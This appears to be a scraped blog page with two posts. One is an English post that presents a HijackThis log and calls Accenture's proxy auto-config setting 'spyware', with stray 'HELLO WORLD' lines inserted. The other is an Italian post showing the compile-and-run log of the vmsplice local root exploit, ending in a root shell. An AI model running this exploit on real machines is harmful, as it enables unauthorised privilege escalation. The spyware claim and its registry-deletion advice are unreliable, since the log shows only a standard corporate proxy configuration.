Accenture is a big Consultancy Corp., it's strength is the Privacy 90 rule which should protect the customers and the employees privacy but is it really so?
I feel a bit worried because in the default PC Configuration Accenture monitors its employees' PCs
Here's the proof:
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at XXX
Platform: Windows 7 (WinNT 6.00.XXXX)
MSIE: Internet Explorer v8.00 (8.00.XXXX.16600)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\Microsoft Office Communicator\communicator.exe
C:\Program Files (x86)\PC Connectivity Solution\Transports\NclMSBTSrvEx.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=6666666
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=6666666
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=6666666
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=6666666
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=6666666
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = http://set-proxy.accenture.com/bin/setup.proxy
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: AcroIEHelperStub - {18DF081C-D8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80064-A445-435b-BC74-9C25C1C58879} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [Communicator] "C:\Program Files (x86)\Microsoft Office Communicator\communicator.exe" /fromrunkey
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - Global Startup: Dell System Manager.lnk = C:\Program Files\Dell\Dell System Manager\DCPSysMgr.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000
O9 - Extra button: Invia a OneNote - {2660000A-7350-4f3c-8081-5763EE0C6C49} - C:\PROGRA~2\MICROS~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: I&nvia a OneNote - {2660000A-7350-4f3c-8081-5763EE0C6C49} - C:\PROGRA~2\MICROS~1\Office12\ONBttnIE.dll
O9 - Extra button: Research - {91780B25-18CC-41C8-B9BE-3C9C571A8262} - C:\PROGRA~2\MICROS~1\Office12\REFIEBAR.DLL
O15 - ESC Trusted Zone: *.nbrxp1000
O15 - ESC Trusted Zone: http://*.nbrxp1011
O15 - ESC Trusted Zone: http://*.nbrxp1023
O15 - ESC Trusted Zone: http://www.wise.com
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = dir.svc.accenture.com
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = dir.svc.accenture.com
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = dir.svc.accenture.com,svc.accenture.com,accenture.com
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = dir.svc.accenture.com
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: SearchList = dir.svc.accenture.com,svc.accenture.com,accenture.com
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = dir.svc.accenture.com,svc.accenture.com,accenture.com
O23 - Service: Accenture Mobile Media Reminder Service - Accenture - C:\Program Files\Accenture\Mobile Media Reminder\MobileMediaReminderService.exe
O23 - Service: Andrea ST Filters Service (AESTFilters) - Andrea Electronics Corporation - C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_58c4996fb11201dd\AESTSr64.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Dell System Manager Service (dcpsysmgrsvc) - Dell Inc. - C:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe
O23 - Service: DSM CM Inventory Agent (dsiasrv) - Dell Inc. - C:\Program Files (x86)\Dell\SysMgt\dsia\bin\DsiaSrv32.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Iap - Dell Inc. - C:\Program Files\Dell\OpenManage\Client\Iap.exe
O23 - Service: FF Install Filter Service (InstallFilterService) - Unknown owner - C:\Program Files (x86)\STMicroelectronics\AccelerometerP11\InstallFilterService.exe
O23 - Service: iPassConnectEngine - iPass, Inc. - C:\Program Files (x86)\iPass\iPassConnect\iPassConnectEngine.exe
O23 - Service: iPassPeriodicUpdateApp - iPass, Inc. - C:\Program Files (x86)\iPass\iPassConnect\iPassPeriodicUpdateApp.exe
O23 - Service: iPassPeriodicUpdateService - iPass, Inc. - C:\Program Files (x86)\iPass\iPassConnect\iPassPeriodicUpdateService.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: ServiceLayer - Nokia - C:\Program Files (x86)\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Audio Service (STacSV) - IDT, Inc. - C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_59b4996fb11201dd\STacSV64.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: DW WLAN Tray Service (wltrysvc) - Dell Inc. - C:\Program Files\Dell\DW WLAN Card\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 8754 bytes
What Does it mean?
Everytime You visit a website with a web browser (yes not only Internet Explorer) an Accenture Proxy Server (http://set-proxy.accenture.com) is informed (hijacking the requests) and with some browsers you can also see it if You have a quick eye..
HELLO WORLD!!!
This is CTCPX4101 Production.
This is CTCPX4101 Production.
How to fix it?
To remove this kind of spyware You have to type "regedit" and remove or renames that keys in the Windows Registry
EFF help us! And if You are an Accenture employeer I wouldn't sleep so quitly . OMG! this useless spyware proxy runs since 2005 it is still there and it could also produce errors in certain configurations.. I can't believe and risk
vmsplice mi buca sia Feisty che Hardy :(
Inserito da assente il 12 Febbraio, 2008 - 18:28 exploit | sicurezza | ubuntuutente@pc01:~/sources$ gcc vmsplice.c -static -Wno-format -o vms utente@pc01:~/sources$ ./vms ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7f4b000 .. 0xb7f7d000 [+] root root@pc01:~/sources# whoami
Una volta fatto il binario potete utilizzarlo anche su altre macchine, a patto che l'architettura sia la stessa.
Se siete maniaci della sicurezza (o haxor) date uno sguardo a Metasploit si tratta di un framework per testare i vari exploit. Un video autoesplicativo su milw0rm
Commenti recenti
2 giorni 16 ore fa
1 settimana 1 giorno fa
3 settimane 7 ore fa
3 settimane 7 ore fa
3 settimane 13 ore fa
3 settimane 2 giorni fa
4 settimane 1 giorno fa
4 settimane 2 giorni fa
5 settimane 1 giorno fa
5 settimane 1 giorno fa